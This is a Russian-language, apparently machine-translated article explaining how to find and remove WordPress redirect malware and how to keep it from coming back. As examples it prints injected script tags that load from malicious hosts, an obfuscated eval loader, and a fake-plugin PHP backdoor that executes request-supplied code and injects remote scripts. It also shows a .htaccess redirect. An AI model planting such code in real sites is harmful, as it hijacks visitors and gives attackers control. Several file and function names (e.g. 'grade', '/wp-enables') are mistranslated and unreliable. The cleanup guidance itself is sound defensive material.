WordPress взломал редирект? Как очистить веб-сайт?

Распечатать · Время на чтение: 28мин · Автор: · Опубликовано · Обновлено

воспроизвестиПрослушать статью

WordPress заражен вредоносным ПО с перенаправлением -редирект. Вредоносный редирект.

Вредоносный редирект на WordPress. Если ваш веб-сайт WordPress или панель администратора автоматически перенаправляются на спам-сайт, ваш веб-сайт, вероятно, был взломан и заражен вредоносным ПО с перенаправлением. Итак, что вы можете сделать со взломанной вредоносной программой перенаправления WordPress на вашем сайте? Прежде всего, подтвердите, есть ли у вас взлом, просканировав свой веб-сайт.

Важно помнить, что время здесь ваш лучший друг. Не тратьте время на мучения по этому поводу. Взлом полностью поправим, и ваш сайт можно очистить. Но нужно двигаться быстро.

Я расскажу Вам о действиях, которые помогут вам удалить вредоносные перенаправления с вашего сайта, исправить ваш сайт и убедиться, что это не повторится. С несколькими вариантами хака перенаправления WordPress может быть сложно добраться до корня этого. Эта статья поможет вам быстро найти и удалить вредоносное ПО шаг за шагом.

Что означает взломанная переадресация (вредоносный редирект) WordPress?

Взломанная переадресация WordPress - вредоносный редирект.

Взломанная переадресация WordPress происходит, когда на ваш веб-сайт внедряется вредоносный код, который затем автоматически перенаправляет ваших посетителей на другой веб-сайт. Как правило, целевой веб-сайт содержит спам, фармацевтическую продукцию с серого рынка или незаконные услуги.
Существует много типов вредоносных программ, таких как вредоносные программы favicon, которые вызывают такое поведение, поэтому взлом перенаправления вредоносных программ WordPress — это общий термин, относящийся к преобладающему симптому: вредоносные перенаправления.

Этот тип взлома затрагивает миллионы веб-сайтов и ежедневно приводит к ужасным потерям. Веб-сайты теряют доход, брендинг и SEO-рейтинг, не говоря уже о стрессе восстановления.

Однако самое худшее во взломе то, что он постоянно ухудшается. Вредоносная программа распространяется через файлы и папки и даже базу данных вашего веб-сайта, копируя себя и используя ваш веб-сайт для заражения других.

Я расскажу о конкретных последствиях взлома позже в этой статье, но достаточно сказать, что ваш приоритет для спасения вашего веб-сайта — действовать сразу и не медлить.

Как мне узнать, что мой сайт WordPress перенаправляется в спам?

Прежде чем исправлять проблему с перенаправлением взломанного сайта WordPress, нам нужно сначала установить, что ваш сайт определенно взломан. Как и в случае с инфекцией, взломы имеют симптомы. И затем, как только вы определили симптомы, вы можете подтвердить диагноз с помощью нескольких тестов.

Как указывалось ранее, автоматические перенаправления являются надежным признаком взлома WordPress с перенаправлением. Перенаправления со спамом могут возникать из результатов поиска, на определенных страницах или даже при попытке войти на свой веб-сайт. Проблема с перенаправлениями заключается в том, что они не всегда происходят последовательно или надежно.

Например, если вы зашли на свой сайт, и он был перенаправлен, возможно, этого не произойдет во второй, третий или четвертый раз. Хакеры умны, и они настраивают файл cookie, чтобы убедиться, что проблема возникает только один раз.

Результатом этого является то, что легко впасть в ложное чувство безопасности, когда вы чувствуете, что это может быть случайностью. Существует крошечная вероятность того, что это может быть и ошибка в коде, но когда я говорю «крошечная», я имею в виду бесконечно малую вероятность.

Проверьте наличие признаков взломанного редиректа в WordPress

Как правило, взломы проявляются по-разному. По отдельности это могут быть ошибки веб-сайта, такие как старый код отслеживания, но если вы видите два или более из этих симптомов на своем веб-сайте, вы можете быть уверены, что ваш веб-сайт был взломан.

  • Сайт WordPress перенаправляется на спам-сайт: классический симптом взлома WordPress с перенаправлением. В зависимости от варианта вредоносного ПО перенаправление может происходить по-разному или в разных местах на вашем сайте.
    Автоматические перенаправления: вредоносные программы перенаправляют ваших посетителей автоматически на спам-сайты, когда кто-то посещает ваш сайт. Это также происходит, если кто-то переходит на ваш сайт из Google или Яндекс. Как правило, вы также будете перенаправлены, если попытаетесь войти на свой сайт.
    Перенаправление ссылок: кто-то нажимает на ссылку, а затем перенаправляется на другой веб-сайт. Это особенно умно, потому что посетители нажимают на ссылки, ожидая, что их все равно перенаправят в другое место.
    Перенаправления только для мобильных устройств: только если доступ к вашему веб-сайту осуществляется через мобильное устройство, он перенаправляется.
  • Результаты Google показывают сообщение «Возможно, сайт взломан»: при отображении вашего веб-сайта в результатах поиска появляется небольшое сообщение: «Возможно, сайт взломан» — появится прямо под заголовком. Это способ Google предупредить посетителей о потенциально взломанном сайте.
  • Черный список Google: самый большой из всех красных флажков — в буквальном смысле — черный список Google — это верный признак того, что ваш сайт был взломан. Даже если ваши посетители используют другую поисковую систему, они также используют черный список Google, чтобы отметить взломанные сайты.
  • Бан сайта в Яндекс: также верный признак взломанного веб-сайта, позиции вашего веб-сайта выподут из поисковой выдачи Яндекса. Возможно останется главная страница, но это не факт.
  • Google Реклама помечает скрипты на вашем веб-сайте: Если вы попытаетесь разместить рекламу на своем веб-сайте, Google Реклама выполнит сканирование вашего веб-сайта и предупредит вас о сценариях перенаправления в ваших публикациях или на страницах.
  • Веб-хостинг приостановил действие вашей учетной записи: Веб-узлы приостанавливают работу веб-сайтов по нескольким причинам, и вредоносное ПО является одной из основных. Если вы видите это сообщение, когда пытаетесь получить доступ к своему веб-сайту, проверьте свою электронную почту по какой-то причине. Как вариант, обратитесь в их службу поддержки.
  • Люди жалуются на ваш сайт: ужасная часть взломов заключается в том, что администраторы веб-сайтов обычно последними узнают о взломе, если только у них не установлен хороший плагин безопасности. Так много людей узнают об этом, потому что посетители и пользователи веб-сайтов жалуются на то, что веб-сайт перенаправляется на спам или даже получает нежелательную электронную почту.

Если вы видите какой-либо из перечисленных выше симптомов, рекомендуется записать информацию об этом. Какой браузер вы использовали? Какое устройство вы использовали? Эта информация может помочь определить тип вредоносного ПО для взлома WordPress, с которым вы сталкиваетесь, и, следовательно, быстрее устранить его.

Подтвердите, заражен ли ваш сайт взломом перенаправления

Следующий шаг к обнаружению симптома — убедиться, что это действительно взлом. Самый быстрый способ убедиться, что ваш веб-сайт подвержен вредоносным перенаправлениям — это отсканировать ваш веб-сайт.

1. Просканируйте свой сайт с помощью плагина безопасности

Если вы все еще не уверены на 100 %, что ваш веб-сайт взломан, воспользуйтесь бесплатным онлайн-сканером для подтверждения. Очень частым случаем является доступ к вашему веб-сайту с мобильного устройства, что указывает на вредоносное ПО, находящееся в файле .htaccess. Или тот, который мы часто видим — это взлом страниц, который автоматически перенаправляет. Это происходит, когда в базе данных есть вредоносное ПО.

Далее в статье мы рассмотрим другие варианты вредоносного ПО. Прямо сейчас я хочу подчеркнуть, что прямое вредоносное ПО, взломанное WordPress, может быть практически в любом месте вашего сайта.

Из-за этого каждый сканер будет помечать его по-разному. Например, Quttera пометит вредоносное ПО следующим образом:

Название угрозы: Heur AlienFile gen

И WordFence покажет предупреждение о целой куче неизвестных файлов, например:

* Неизвестный файл в ядре WordPress: wp-admin/css/colors/blue/php.ini
* Неизвестный файл в ядре WordPress: wp-admin/css/colors/coffee/php.ini
* Неизвестный файл в ядре WordPress: wp-admin /css/colors/эктоплазма/php.ini
Это хорошие признаки того, что ваш сайт был взломан, потому что, как мы увидим позже, в папке /wp-admin не должно быть ничего, кроме основных файлов из установки WordPress.

Сказав это, к сожалению, это не помогает для удаления. Есть несколько серьезных проблем с тем, как другие плагины безопасности помечают вредоносные программы, из-за их механизмов обнаружения. Существует множество ложных срабатываний, пропущенных файлов и множество других проблем. Ваш веб-сайт важен, поэтому выбирайте плагин безопасности с умом.

2. Сканировать с помощью онлайн-сканера безопасности

Вы также можете использовать онлайн-сканер безопасности, такой как Sucuri SiteCheck, для проверки взломанного вредоносного ПО перенаправления. Онлайн-сканер безопасности или внешний сканер просматривает код на ваших страницах и в сообщениях в поисках вредоносных сценариев.

Единственная проблема с интерфейсным сканером заключается в том, что он может и будет проверять только тот код, к которому у него есть доступ. То есть в основном исходный код страниц и постов. Хотя на этих страницах существует множество взломанных вредоносных программ для перенаправления, в основных файлах есть несколько вариантов. Внешний сканер вообще не покажет их.

Я советую использовать онлайн-сканер безопасности в качестве диагностического инструмента первой линии. Если он окажется положительным, вы можете быть уверены, что он положительный, и работать над устранением взлома. Если он окажется отрицательным, можно вручную проверить места, не просканированные фронтенд-сканером. Таким образом, вы можете исключить часть ручной работы.

3. Сканировать сайт на наличие вредоносных программ вручную

Если вы используете подключаемый модуль безопасности для поиска взломанной вредоносной программы перенаправления, вы можете полностью пропустить этот раздел. Хороший плагин безопасности, сделает именно то, что я предлагаю ниже, но намного быстрее и лучше.

Сканирование вашего веб-сайта на наличие вредоносных программ, по сути, означает поиск нежелательного кода в файлах и базе данных. Я понимаю, что «мусорный код» бесполезен как направление, но из-за вариантов нет ни одной строки, которую вы могли бы быстро найти и объявить о взломе.

Однако в следующем разделе я перечислил несколько примеров вредоносных программ, которые бывают на других веб-сайтах. А в следующем разделе мы поговорим о типичных местах, куда внедряется вредоносное ПО, в зависимости от наблюдаемого поведения перенаправления.

Как выглядит вредоносное ПО для редиректа в WordPress

Я утрирую эту строчку в этой статье, но вредоносное ПО для перенаправления взлома WordPress имеет много вариантов, и поэтому нет единого стандартного фрагмента кода, на который можно было бы указать: «Ищите это!»

Тем не менее, я могу дать вам представление о том, как выглядят некоторые вредоносные коды:

  • Код может располагаться где-то в заголовке страницы или на всех страницах таблицы wp_posts. Вот некоторые примеры:
type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&#038;ver=5.7.2' id='hello_newscript5-js'></script>
 type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'></script>
 type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'></script>
 type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'></script>
 type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'></script>
 src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'></script>
  • Таблицы wp_options могут иметь незнакомые URL-адреса в файле site_url. Вот несколько примеров:
stat/traksatiticss
dest/colecfattracks
gotosecnd
ws.stienernando
  • Скрипты также могут быть запутаны, что означает, что вам нужно запустить их через онлайн-деобфускатор, чтобы извлечь фактический код.

Запутанный код

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118,97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32,32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59));')
И что это на самом деле означает
(function() var po = document.createElement('script'); po.type = 'text/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); )(); 
  • Поддельные плагины могут иметь файлы, которые выглядят так при открытии
<?php
/**
 * Plugin Name:       Wp Zzz
 * Plugin URI:        https://wpforms.com
 * Description:       Default WordPress plugin
 * Author:            WPForms
 * Author URI:        https://wpforms.com
 * Version:           1.6.3.1
 *
 */ function simple_init()
{
$v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}}
}
add_action('init','simple_init');
function my_custom_js() {
    echo '<script type="text/javascript" src="https://po/rt.tr/ansand/fie/stas./ga/js.php?from=l&sid=346"></script>';
}
add_action( 'admin_head', 'my_custom_js' );
add_action( 'wp_head', 'my_custom_js' );
  • Перенаправления для мобильных устройств указывают на изменения в файле .htaccess. Приведенный ниже код перенаправляет на https://daily-prize-best  /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L]
RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L]
RewriteRule ^.+\.html$ https://bit.ly/3iZl8mm [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . https://bit.ly/3iZl8mm [L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

Места для поиска вредоносного ПО с перенаправлением

WordPress разделен на две основные части: файлы и базу данных. Проблема со взломанной вредоносной программой перенаправления заключается в том, что она может быть где угодно.

Если вы знакомы с изменением кода вашего веб-сайта, вы можете найти упомянутый мною код перенаправления в следующих местах. Загрузите резервную копию вашего веб-сайта — как файлов, так и базы данных — для поиска подозрительных дополнений.

Опять же, имейте в виду, что существуют варианты, такие как классическая, ситуационная, специфичная для устройства или даже связанная переадресация. Код будет разным для каждого, как и местоположение.

А. Файлы веб-сайта

  • Основные файлы WordPress: начиная с самых простых, /wp-admin и /wp-includes не должны отличаться от новой установки WordPress. То же самое касается файлов index.php, settings.php и load.php . Это основные файлы WordPress, и настройки не вносят в них никаких изменений. Сравните со свежей установкой WordPress, чтобы убедиться в наличии каких-либо изменений. Файл .htaccess — это особый случай. Взлом мобильного перенаправления почти всегда будет отображаться в этом файле. Ищите правило агента пользователя, определяющее поведение в зависимости от используемого устройства, и проверяйте наличие там скрипта перенаправления.
  • Файлы активной темы: Если у вас установлено более одной темы (что не рекомендуется для начала), убедитесь, что активна только одна из них. Затем просмотрите файлы активных тем, такие как header.php, footer.php и functions.php, на наличие странного кода. Хороший способ проверить это — загрузить нетронутые установки с сайтов разработчиков и сопоставить код с этими файлами. Как правило, эти файлы должны быть в определенном формате, поэтому мусорный код торчит. Имейте в виду, что настройки также изменят код. Кроме того, если вы используете обнуленные темы или плагины, вы можете остановить диагностику прямо здесь, потому что мы можем вас заверить, что вас взломали из-за них.
  • Поддельные плагины на вашем сайте: Да, такое имеет место быть. Хакеры маскируют вредоносные программы, делая их максимально законными. Зайди в папку wp-content/plugins и посмотрите. Что-то, что вы не установили? Какие-то странные дубликаты? У кого-нибудь из них есть только один или два файла в папках?

Вот некоторые примеры:

/wp-content/plugins/mplugin/mplugin.php
/wp-content/plugins/wp-zzz/wp-zzz.php
/wp-content/plugins/Plugin/plug.php
Если у вас установлено множество плагинов, может быть сложно проверить их все. Эмпирическое правило для выявления поддельных плагинов заключается в том, что по соглашению имена законных плагинов редко начинаются с заглавной буквы, а их имена не содержат специальных символов, кроме дефисов. Это не правила, а условности. Так что не придавайте им слишком большого значения, чтобы окончательно идентифицировать подделки. Если вы подозреваете, что плагин является подделкой, погуглите его и найдите оригинальную версию в репозитории WordPress. Загрузите его оттуда и проверьте, совпадают ли файлы.

Б. База данных

  • Таблица wp_posts: Вредоносные скрипты часто присутствуют на каждой странице. Но, как мы уже говорили, хакеры очень хитры. Проверьте хороший образец сообщений, прежде чем решить, что взлом не существует. Еще один способ проверить код ваших страниц и сообщений — проверить исходный код страницы с помощью браузера. Каждая страница вашего сайта имеет HTML-код, который читается браузерами. Откройте исходный код страницы и проверьте верхний и нижний колонтитулы и все, что находится между тегами script, на наличие вещей, которые выглядят неуместными.Раздел head содержит информацию, которую браузер использует для загрузки этой страницы, но не показывается посетителю. Скрипты вредоносных программ часто прячутся здесь, поэтому они загружаются раньше, чем остальная часть страницы.
  • Таблица wp_options: проверьте siteurl. Это должен быть URL вашего веб-сайта в 99% случаев. Если это не так, это ваш хак прямо здесь.

Однако сейчас не время пытаться что-либо удалить. Вы должны быть полностью уверены, что сценарии Javascript или PHP определенно вредоносны. Вы хотите очень быстро избавиться от вредоносного ПО, но поспешность приведет вас к неработающему сайту.

Другие способы проверки перенаправления вредоносного ПО

Вы можете не увидеть все перечисленные выше симптомы как администратор веб-сайта. Хакеры ловко исключают ваш IP и учетную запись из просмотра результатов взлома, потому что они хотят оставаться незамеченными как можно дольше.

Кроме того, вы можете увидеть симптом один раз, а затем не сможете воссоздать его. Все это очень запутанно. Есть несколько других способов проверить наличие симптомов, если вы не видите их непосредственно на своем веб-сайте.

  • Проверьте консоль поиска Google: они будут помечать заражение вредоносным ПО в разделе «Проблемы безопасности».
  • Используйте браузер в режиме инкогнито для доступа к вашему веб-сайту, чтобы увидеть, что видит обычный посетитель
  • Проверяйте журналы действий на наличие необычных действий пользователей, таких как повышение привилегий пользователя или создание сообщений.

Следующий раздел посвящен исключительно удалению. Сделайте глубокий вдох и выпейте чайку или кофейку. Давайте вместе пройдем через весь процесс.

Как удалить инфекцию взломанного редиректа WordPress?

Теперь, когда мы знаем, что ваш веб-сайт перенаправляется на другой сайт, вам нужно действовать быстро. С течением времени количество взломов увеличивается в геометрической прогрессии, потому что вредоносное ПО распространяется на большее количество файлов и папок вашего веб-сайта. Это не только увеличивает урон, но и значительно затрудняет восстановление.

Я предполагаю, что вы уже просканировали свой веб-сайт, прежде чем попасть в этот раздел. Однако, если вы этого не сделали, первое, что вы должны сделать, это отсканировать свой веб-сайт.

Существует 2 основных способа удаления вредоносных перенаправлений с вашего сайта. Я настоятельно рекомендую использовать подключаемый модуль безопасности, поскольку я своими глазами видел, какой ущерб веб-сайту могут нанести взломы.

1. (РЕКОМЕНДУЕТСЯ) Используйте плагин безопасности для удаления вируса перенаправления

Плагины безопасности используются для удаления трудно обнаруживаемых вредоносных программ. Все, что вам нужно сделать, это установить плагин на свой сайт и подождать несколько минут, чтобы восстановить ваш сайт.

Если вы использовали сканер для подтверждения того, что ваш веб-сайт взломан, все, что вам нужно сделать, это обновить его и вернуть свой сайт.

Есть несколько причин, по которым рекомендуется использовать подобные плагины:

  1. Удаляют только вредоносные программы и оставляет ваш сайт целым;
  2. Находят бэкдоры, которые хакеры оставляют для повторного заражения, а также удаляют их;
  3. Встроенный брандмауэр для защиты вашего сайта от вредоносного трафика.
Если вы не можете получить доступ к wp-admin

В этом случае обратитесь за помощью в службу экстренного удаления вредоносных программ. Специализированный эксперт по безопасности быстро очистит ваш веб-сайт и позаботится о том, чтобы он снова заработал в кратчайшие сроки.

2. Удалите вредоносное ПО перенаправления WordPress вручную

Можно удалить вредоносное ПО с перенаправлением вручную с вашего веб-сайта, но для этого есть предварительные условия.

— Во-первых, вам нужно знать, как настроен WordPress. Начиная с того, как выглядят основные файлы, и заканчивая папками и файлами, которые каждый плагин и тема создают для работы. Удаление одного необходимого файла может привести к сбою вашего сайта, поэтому ваш сайт не только взломан, но и отключен.

— Во-вторых, вы должны уметь отличать хороший код от плохого, т.е. вредоносного ПО. Вредоносный код либо маскируется под легитимный код, либо запутывается, чтобы его нельзя было прочитать. Очень сложно отличить хороший код от плохого, поэтому многие сканеры страдают от ложных срабатываний.

Примечание: Вы можете нанять эксперта по WordPress для удаления вредоносного ПО. Имейте в виду, что, эксперты по безопасности стоят дорого, и им потребуется время, чтобы удалить взлом.

Кроме того, они не гарантируют, что у вас не будет рецидива. И тем не менее, я по-прежнему рекомендую этот способ действий, а не попытки удалить вредоносное ПО вручную.

Хорошо, это предостережения. Вот действия для удаления вредоносного ПО перенаправления с вашего сайта:

1. Сделайте резервную копию вашего сайта

Прежде чем что-либо делать, обязательно сделайте резервную копию . Даже если сайт взломан, он все равно работает. Поэтому, если что-то пойдет не так в процессе удаления вредоносного ПО, у вас есть резервная копия, к которой можно вернуться. Взломанный сайт трудно очистить. Разбитый веб-сайт еще сложнее очистить и иногда невозможно восстановить.

Веб-хостинг может приостановить работу вашего сайта или даже удалить его. Тогда получение доступа к вашему веб-сайту даже для его очистки является серьезной проблемой. Вам нужно будет связаться со службой поддержки веб-хостинга, чтобы получить доступ к приостановленному сайту, но с удаленным сайтом без резервной копии не обойтись.

2. Загрузите чистую версию WordPress

Загрузите свежие установки WordPress, а также все плагины и темы, которые вы используете. Версии должны соответствовать тому, что есть на вашем сайте.

После их загрузки вы можете использовать чистые файлы для сравнения с файлами вашего веб-сайта. Вы можете использовать онлайн-проверку различий, чтобы найти различия, потому что мы, конечно же, не рекомендуем просматривать их вручную.

По сути, это сопоставление сигнатур, что и делает большинство сканеров безопасности. Однако, по крайней мере, теперь вы знаете, какие файлы и папки необходимы для правильной работы вашего сайта. На этом этапе ничего не удаляйте. Вы просто устанавливаете базовый уровень, чтобы понять, какие файлы необходимы.

3. Ищите и удаляйте вредоносные программы перенаправления

Это, пожалуй, самый сложный этап процесса. Как я уже говорил, вам нужно уметь отличать хороший код от плохого, а затем удалять или заменять его по мере необходимости.

Очистите основные файлы WordPress

Крайне важно получить ту же версию WordPress, что и на вашем веб-сайте, иначе вы можете столкнуться с крахом веб-сайта. После загрузки используйте cPanel или FTP для доступа к файлам вашего веб-сайта и замените следующие папки:

— /wp-admin
/wp-enables
Эти папки используются WordPress для запуска и загрузки вашего веб-сайта и вообще не предназначены для хранения пользовательского контента. Это была легкая часть. Теперь проверьте следующие файлы на наличие странного кода:
— index.php
— wp-config.php
— wp-settings.php
— wp-load.php
— .htaccess
Кроме того, в папке /wp-uploads не должно быть PHP-скриптов. Я понимаю, что «странный код» очень расплывчат, но, как мы уже говорили ранее, у взломанной вредоносной программы перенаправления WordPress есть много, очень много вариантов.

Таким образом, я не могу точно сказать, какой код вы увидите в любом из этих файлов. Если вы понимаете, как работает код, вы можете обратиться к списку файлов WordPress, чтобы понять, что каждый из них делает, и выяснить, делает ли какой-либо код что-то другое. Как только вы убедитесь, что нашли этот код, удалите его.

Очистите темы и плагины от вредоносных программ

Все файлы и папки, связанные с темой и плагином, хранятся в папке /wp-content. Вы можете проверить каждый из файлов вашего веб-сайта, чтобы увидеть, где есть разница в коде.

Здесь следует предостеречь: не все изменения плохи. Если вы настроили какой-либо из своих плагинов или тем — что, вероятно, у вас есть, — тогда будут отличия от чистой установки. Если вы не возражаете против потери этих настроек, вы можете пойти дальше и заменить файлы в массовом порядке.

Скорее всего, вы захотите сохранить проделанную работу, поэтому начните внимательно изучать каждое из отличий. Если вы можете следовать логике кода, вы можете понять, как файлы взаимодействуют друг с другом и с остальной частью вашего сайта. Это должно позволить вам найти вредоносное ПО и удалить его.

Если у вас есть значительное количество тем и плагинов, это может оказаться непростой задачей. Вот несколько хороших мест для начала:

  • Файлы активной темы
    — header.php
    — footer.php
    — functions.php
  • Уязвимые плагины
    — Кто-нибудь недавно был взломан
    — Есть ли не обновленные
  • Поддельные плагины
    — Очень мало файлов
    — Очевидные дубликаты
Некоторые вредоносные файлы выглядят безобидно и часто имитируют настоящие имена файлов. Здесь пригодятся чистые установки, но также обратитесь за поддержкой к разработчикам плагинов и тем, если вы не совсем уверены.

Удалить вредоносное ПО из базы данных WordPress

Используйте phpMyAdmin, чтобы загрузить базу данных для очистки. Затем проверьте таблицы на наличие подозрительного контента, такого как URL-адреса спама или ключевые слова. Осторожно удалите этот контент, убедившись, что это плохой код, а не модифицированный хороший код.

В особенности проверьте следующие таблицы:

— wp_options
— wp_posts
В зависимости от размера вашего веб-сайта это может занять значительное количество времени. Как правило, если вредоносное ПО находится в вашей таблице wp_posts, оно будет в каждом отдельном сообщении. Если у вас есть сотни постов с большим количеством контента, то это монументальная задача по очистке вручную.

Однако после того, как вы определили сценарий вредоносного ПО, вы можете использовать SQL (или попросить кого-то, кто разбирается в SQL), удалить сценарий из каждого сообщения. Предупреждение здесь заключается в том, что вы не можете быть уверены, что это единственное вредоносное ПО в таблице.

Кроме того, особенно с сайтами электронной коммерции, дважды проверьте, не удаляете ли вы важную информацию о пользователе или заказе.

4. Удалите бэкдоры

Теперь, когда вы очистили свой веб-сайт от вредоносных программ, проверьте наличие бэкдоров. Это точки входа на ваш веб-сайт, которые оставляет хакер, чтобы они могли повторно заразить ваш веб-сайт, если их первоначальный взлом был обнаружен.

Бэкдоры могут быть в нескольких местах. Некоторый код для поиска:

  • grade
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13
Слово предостережения: они не обязательно все плохие. Это законные PHP-скрипты, которые можно слегка изменить, чтобы они служили бэкдорами. Будьте осторожны с удалением любого без надлежащего анализа.

5. Перезагрузите очищенные файлы

Теперь, когда вы убрали взлом, вам нужно снова собрать свой сайт. Используйте файловый менеджер для повторной загрузки файлов и phpMyAdmin на cPanel или VestaCP для замены вашего веб-сайта.

Это очень похоже на то, как вы восстанавливаете резервную копию вручную, и означает, что вы должны сначала удалить существующие файлы и базу данных. Если вы случайно пропустили шаг резервного копирования в начале, сделайте это сейчас. Резервное копирование вашего веб-сайта, даже взломанного, избавит вас от горя, если что-то пойдет не так.

6. Очистить кеш сайта

Теперь, когда ваш очищенный веб-сайт загружен, очистите кеш. Кэш хранит предыдущие версии ваших страниц и контента и показывает их посетителям вашего сайта. Чтобы ваш недавно очищенный сайт вел себя так, как ожидалось, вам необходимо почистить кеш.

7. Проверьте каждый из плагинов и тем

Печальный факт вредоносных программ заключается в том, что они могут спрятаться практически где угодно. Поскольку вы потратили все это время и энергию на чистку своего веб-сайта вручную, стоит потратить несколько дополнительных минут, чтобы убедиться, что ваши усилия увенчались успехом.

Я рекомендую вам использовать FTP для этого, так как вам потребуется много работы, чтобы изменить файлы веб-сайта.

  • Отключите все ваши плагины и темы, переименовав папку wp_contents во что-то другое.
  • Затем активируйте их одну за другой, каждый раз проверяя свой сайт на перенаправление.
  • Если проблем нет, вы знаете, что плагины и темы не содержат вредоносных программ.

Почему я настоятельно не рекомендую удалять хакерские перенаправления вручную

Вам может быть интересно, почему я не рекомендую удалять хаки таким образом. Думайте о хаках так же, как о болезни, например, о раке или сломанной кости.

Вы бы предпочли оставить заботу об этих болезнях врачам, которые являются обученными профессионалами с большим опытом в их лечении. Неподготовленные люди приносят больше вреда, чем пользы. Спросите любого врача, которому приходилось иметь дело с плохо сросшимся переломом кости.

Есть несколько вещей, которые могут пойти не так при ручном удалении взлома:

  • Вредоносное ПО может распространяться в неожиданных местах, и его трудно удалить безошибочно.
  • Удаление только вредоносного ПО недостаточно, если не устранены уязвимости и/или бэкдоры.
  • Неумелое удаление иногда может привести к поломке других частей веб-сайта.
  • Большие сайты (например, магазины электронной коммерции) будут очень сложными и трудоемкими, чтобы пройти их вручную.
  • Время имеет решающее значение, поскольку с течением времени хакерские атаки становятся все хуже в геометрической прогрессии.
  • Может не иметь доступа к вашему веб-сайту, если хост заблокировал вашу учетную запись
Проще говоря, на взломанном веб-сайте существует огромная погрешность. Существует вполне реальная опасность выйти из этого процесса в худшем положении, чем вы начали. Лучше всего использовать хороший плагин безопасности, для удаления хакерских скриптов.

Веб-сайт перенаправляется в спам: как это повлияло на мой веб-сайт?

Веб-сайты представляют собой сложные смеси программного обеспечения, и по своей сути ни одно программное обеспечение не защищено на 100% от взлома. Такова реальность любого программного обеспечения: от 8-битных игр прошлых лет до огромных информационных систем управления, используемых банками.

Веб-сайты WordPress ничем не отличаются. В то время как основные файлы WordPress наиболее близки к пуленепробиваемым, этого нельзя сказать о плагинах и темах. Плагины и темы добавляют веб-сайтам динамические элементы, функциональность и дизайн, и сайт без них был бы безопасным, но также статичным и скучным.

Вот список причин взлома сайтов WordPress:

  1. Уязвимости в плагинах и темах;
  2. Плохие пароли и скомпрометированные учетные записи пользователей;
  3. Бэкдоры в обнуленных темах и плагинах;
  4. Атаки XSS- скриптов;
  5. Брутфорс атаки с ботами.
Как уже говорилось ранее, к безопасности веб-сайта нельзя относиться легкомысленно. Теперь у вас есть непосредственный опыт того, насколько сложно устранить взлом, поэтому в идеале вы должны иметь стратегию, чтобы гарантировать, что это не повторится.

Как предотвратить взлом WordPress Redirect в будущем?

Теперь, когда вы получили чистый веб-сайт, следующие шаги заключаются в том, чтобы предотвратить перенаправление вашего веб-сайта WordPress в спам.

Взломы повторяются постоянно. В первую очередь это связано с тем, что причина, по которой ваш сайт был взломан, не была устранена. Чтобы предотвратить повторение, необходимо предпринять следующие шаги:

1. Установите плагин безопасности: выберите хороший плагин безопасности, который может сканировать, очищать и предотвращать взломы. Такие плагины имеют встроенный брандмауэр, который упреждающе блокирует попадание вредного трафика на ваш сайт.
2. Смените все пароли для пользователей и базы данных: Скомпрометированные учетные записи пользователей и легко угадываемые пароли — вторая причина взломов сайтов.
3. Сбросьте и проверьте учетные записи пользователей: проверьте учетные записи пользователей с ненужным доступом администратора и удалите их.
4. Измените роли + ключи безопасности: роли и ключи безопасности — это длинные строки, которые WordPress прикрепляет к данным для входа в файлы cookie, чтобы помочь пользователям безопасно оставаться в системе. Вы можете изменить их в своем файле wp-config.php после использования генератора WordPress для получения новых.
5. Обязательно используйте только проверенные плагины и темы: я говорил об этом раньше, но стоит повторить. Используйте плагины и темы только от проверенных разработчиков. Эти разработчики обеспечат поддержку и обновления, которые невероятно важны для безопасности. Ни при каких обстоятельствах не используйте пустые темы и плагины. Что бы вы ни сохранили, вы много раз потеряете из-за неизбежного взлома.
6. Убедитесь, что у вас есть SSL: в идеале, SSL уже должен быть на вашем веб-сайте , но мы включаем его для полноты картины. SSL гарантирует, что связь с веб-сайтом и с веб-сайта зашифрована. Google также активно продвигает это изменение, и вскоре вы начнете видеть штрафы с SEO, если вы еще этого не сделали, если SSL не включен на вашем веб-сайте.
